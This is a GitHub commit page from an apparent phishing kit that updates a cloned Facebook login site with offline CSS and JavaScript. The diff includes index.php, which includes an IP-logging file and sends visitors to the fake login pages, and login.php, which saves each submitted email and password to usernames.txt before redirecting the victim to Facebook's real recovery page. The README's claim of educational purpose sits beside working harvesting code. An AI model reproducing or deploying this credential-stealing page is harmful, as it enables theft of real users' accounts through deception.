Skip to content

Commit e9b4c48

Browse files
authored
Fixed Facebook Page from KasRoudra/master
Issues : #442 #433 `Probably permanent fix for facebook with offline css and js`
2 parents 69d7aa3 + 197b828 commit e9b4c48

File tree

10 files changed

+13893
-59
lines changed

10 files changed

+13893
-59
lines changed

.sites/facebook/LICENSE

Lines changed: 21 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,21 @@
1+
MIT License
2+
3+
Copyright (c) 2021 KasRoudra
4+
5+
Permission is hereby granted, free of charge, to any person obtaining a copy
6+
of this software and associated documentation files (the "Software"), to deal
7+
in the Software without restriction, including without limitation the rights
8+
to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
9+
copies of the Software, and to permit persons to whom the Software is
10+
furnished to do so, subject to the following conditions:
11+
12+
The above copyright notice and this permission notice shall be included in all
13+
copies or substantial portions of the Software.
14+
15+
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
16+
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
17+
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
18+
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
19+
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
20+
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
21+
SOFTWARE.

.sites/facebook/README.md

Lines changed: 7 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,7 @@
1+
# Facebook Static Login Form (Full offline css and js)
2+
3+
## Author: [KasRoudra](https://github.com/KasRoudra)
4+
5+
#### This is created for educational purposes demonstrating how phishing works.
6+
7+
### Use/Copy it legally and provide proper credit

.sites/facebook/hsts-pixel.gif

43 Bytes
Loading

.sites/facebook/index.php

Lines changed: 2 additions & 2 deletions
Original file line numberDiff line numberDiff line change
@@ -1,9 +1,9 @@
11
<?php include 'ip.php';?>
22
<script type="text/javascript">
33
if (screen.width <= 699) {
4-
document.location = "mobile.html";
4+
document.location = "mobile.html";
55
}
66
else {
7-
document.location = "login.html";
7+
document.location = "login.html";
88
}
99
</script>

.sites/facebook/login.html

Lines changed: 4447 additions & 33 deletions
Large diffs are not rendered by default.

.sites/facebook/login.php

Lines changed: 2 additions & 3 deletions
Original file line numberDiff line numberDiff line change
@@ -1,6 +1,5 @@
1-
<?php
2-
3-
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . " Pass: " . $_POST['pass'] . "\n", FILE_APPEND);
1+
<?php
2+
file_put_contents("usernames.txt", "Facebook Username: " . $_POST['email'] . "\nPassword: " . $_POST['pass'] ."\n", FILE_APPEND);
43
header('Location: https://facebook.com/recover/initiate/');
54
exit();
65
?>

.sites/facebook/logo.svg

Lines changed: 1 addition & 0 deletions
Loading

.sites/facebook/mobile.html

Lines changed: 2947 additions & 21 deletions
Large diffs are not rendered by default.

.sites/facebook/script.js

Lines changed: 379 additions & 0 deletions
Some generated files are not rendered by default. Learn more about customizing how changed files appear on GitHub.

.sites/facebook/style.css

Lines changed: 6087 additions & 0 deletions
Large diffs are not rendered by default.

0 commit comments

Comments
 (0)